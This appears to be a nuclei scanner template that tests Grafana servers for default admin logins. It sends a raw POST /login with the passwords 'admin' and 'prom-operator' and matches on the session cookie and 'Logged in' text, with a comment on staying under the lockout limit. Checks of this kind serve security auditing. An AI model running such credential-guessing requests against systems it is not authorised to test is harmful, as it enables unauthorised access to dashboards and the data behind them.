nuclei-templates/default-credentials/grafana-default-credential....

61 lines
1.7 KiB
YAML

id: grafana-default-credential
info:
name: Grafana Default Credentials Check
author: pdteam
severity: high
requests:
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
# https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
- payloads:
# grafana_username:
# - admin
grafana_password:
- prom-operator
- admin
# Added default grafana and prometheus user.
# Source:- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
attack: sniper
# Available types: sniper, pitchfork and clusterbomb
raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"user":"admin","password":"grafana_password"}
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
matchers-condition: and
matchers:
- type: word
words:
- grafana_session
part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word
words:
- Logged in
part: body
# Check for valid string on valid login.
- type: status
status:
- 200